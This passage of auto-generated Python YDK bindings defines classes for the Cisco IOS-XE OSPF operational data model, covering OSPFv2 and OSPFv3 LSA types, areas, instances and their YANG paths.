self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
# Auto-generated binding for the OSPFv3 NSSA LSA body ("nssa" container).
# Carries no leafs of its own; wraps a single "lsa-nssa-external" child whose
# layout mirrors the AS-external LSA body.
class Nssa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
# No leafs on this node.
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
# NSSA external data: same leaf set as the AS-external LSA body, plus a
# nested "flags" container with the E-bit.
class LsaNssaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
# Flag bits of the NSSA external entry (single boolean e-flag).
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
# Auto-generated binding for the OSPFv3 link-LSA body ("link-data"
# container): router priority, link-local address, prefix count, option bits.
class LinkData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
# Auto-generated binding for the OSPFv3 intra-area-prefix LSA body
# ("ia-prefix" container): referenced LSA identification plus prefix count.
class IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
# Auto-generated binding for the keyed "ospfv3-link" YANG list: one entry per
# OSPFv3 link, keyed by (interface-id, neighbor-interface-id,
# neighbor-router-id).
class Ospfv3Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
# YANG list keys; their values are embedded into the segment path below.
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
# Path segment includes the three key predicates, evaluated lazily so it
# reflects the key values current at call time.
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
# Auto-generated binding for the keyed "ospfv3-prefix" YANG list: one entry
# per prefix, keyed by the prefix string.
class Ospfv3Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
# Key value is embedded into the path predicate at call time.
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
# Auto-generated binding for the keyed "ospfv3-ia-prefix" YANG list:
# intra-area prefixes, keyed by the prefix string. Mirrors Ospfv3Prefix.
class Ospfv3IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
# Key value is embedded into the path predicate at call time.
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
# Auto-generated binding for the keyed "multi-topology" YANG list under
# ospf-instance: one entry per multi-topology name.
class MultiTopology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
# Key value is embedded into the path predicate at call time.
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value)
# Auto-generated binding for the keyed "ospfv2-instance" YANG list directly
# under ospf-oper-data, keyed by instance-id. Child lists: ospfv2-area and
# ospfv2-lsdb-external (nested class definitions follow this constructor).
class Ospfv2Instance(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance, self).__init__()
self.yang_name = "ospfv2-instance"
self.yang_parent_name = "ospf-oper-data"
self.is_top_level_class = False
# No keyed-list ancestor: an absolute path can be computed (see below).
self.has_list_ancestor = False
self.ylist_key_names = ['instance_id']
self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))])
self._leafs = OrderedDict([
('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
])
self.instance_id = None
self.vrf_name = None
self.router_id = None
# Child YANG lists are held as YList containers.
self.ospfv2_area = YList(self)
self.ospfv2_lsdb_external = YList(self)
self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']"
# Absolute path rooted at the top-level ospf-oper-data container.
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value)
# Auto-generated binding for the keyed "ospfv2-area" YANG list, keyed by
# area-id. Child lists: ospfv2-lsdb-area and ospfv2-interface (nested class
# definitions follow this constructor).
class Ospfv2Area(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__()
self.yang_name = "ospfv2-area"
self.yang_parent_name = "ospfv2-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['area_id']
self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))])
self._leafs = OrderedDict([
('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
])
self.area_id = None
self.ospfv2_lsdb_area = YList(self)
self.ospfv2_interface = YList(self)
self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value)
# Auto-generated binding for the keyed "ospfv2-lsdb-area" YANG list: one LSDB
# entry per (lsa-type, lsa-id, advertising-router). Holds common LSA header
# leafs plus one child container per LSA body kind; the nested class
# definitions follow this constructor.
class Ospfv2LsdbArea(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__()
self.yang_name = "ospfv2-lsdb-area"
self.yang_parent_name = "ospfv2-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
])
self.lsa_type = None
self.lsa_id = None
self.advertising_router = None
self.lsa_age = None
self.lsa_options = Bits()
self.lsa_seq_number = None
self.lsa_checksum = None
self.lsa_length = None
# One eagerly-created child container per possible LSA body kind; only the
# one matching lsa-type is expected to carry data (per the model layout).
self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa()
self.unsupported_lsa.parent = self
self._children_name_map["unsupported_lsa"] = "unsupported-lsa"
self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa()
self.router_lsa.parent = self
self._children_name_map["router_lsa"] = "router-lsa"
self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa()
self.network_lsa.parent = self
self._children_name_map["network_lsa"] = "network-lsa"
self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa()
self.network_summary_lsa.parent = self
self._children_name_map["network_summary_lsa"] = "network-summary-lsa"
self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa()
self.router_summary_lsa.parent = self
self._children_name_map["router_summary_lsa"] = "router-summary-lsa"
self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa()
self.external_lsa.parent = self
self._children_name_map["external_lsa"] = "external-lsa"
self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa()
self.nssa_lsa.parent = self
self._children_name_map["nssa_lsa"] = "nssa-lsa"
self.ospfv2_router_lsa_links = YList(self)
# Path segment embeds the three list keys at call time.
self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
# Auto-generated binding for the keyed "ospfv2-router-lsa-links" YANG list:
# one router-LSA link per (link-type, link-id, link-data), each with a list
# of per-topology metrics ("link-topo").
class Ospfv2RouterLsaLinks(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__()
self.yang_name = "ospfv2-router-lsa-links"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_type','link_id','link_data']
self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
])
self.link_type = None
self.link_id = None
self.link_data = None
self.link_topo = YList(self)
# Path segment embeds the three list keys at call time.
self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)
# Per-topology metric entry of a router-LSA link (unkeyed list node).
class LinkTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()
self.yang_name = "link-topo"
self.yang_parent_name = "ospfv2-router-lsa-links"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "link-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
# Auto-generated binding for the "unsupported-lsa" container: raw LSA bytes
# (leaf-list of uint8) for LSA types the device does not decode further.
class UnsupportedLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__()
self.yang_name = "unsupported-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
])
# Leaf-list: holds multiple integer values.
self.lsa_data = []
self._segment_path = lambda: "unsupported-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value)
# Auto-generated binding for the OSPFv2 router-LSA body ("router-lsa"
# container): router LSA flag bits and the advertised link count.
class RouterLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__()
self.yang_name = "router-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
])
self.router_lsa_bits = Bits()
self.router_lsa_number_links = None
self._segment_path = lambda: "router-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
# Auto-generated binding for the OSPFv2 network-LSA body ("network-lsa"
# container): network mask plus the leaf-list of attached router IDs.
class NetworkLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__()
self.yang_name = "network-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
])
self.network_lsa_mask = None
# Leaf-list: holds multiple router IDs.
self.network_attached_routers = []
self._segment_path = lambda: "network-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
# Auto-generated binding for the OSPFv2 network-summary LSA body
# ("network-summary-lsa" container): summary mask plus a list of
# per-topology metrics ("summary-topo").
class NetworkSummaryLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__()
self.yang_name = "network-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "network-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)
# Per-topology metric entry of the network-summary LSA (unkeyed list node).
class SummaryTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "network-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
# Auto-generated binding for the OSPFv2 router-summary LSA body
# ("router-summary-lsa" container). Same layout as NetworkSummaryLsa:
# summary mask plus a "summary-topo" list of per-topology metrics.
class RouterSummaryLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__()
self.yang_name = "router-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "router-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value)
# Per-topology metric entry of the router-summary LSA (unkeyed list node).
class SummaryTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "router-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
                class ExternalLsa(Entity):
                    """YDK binding for the external-lsa container under ospfv2-lsdb-area."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__()
                        self.yang_name = "external-lsa"
                        self.yang_parent_name = "ospfv2-lsdb-area"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))])
                        self._leafs = OrderedDict([
                            ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
                        ])
                        self.external_lsa_mask = None
                        # YANG list of child external-topo entries.
                        self.external_topo = YList(self)
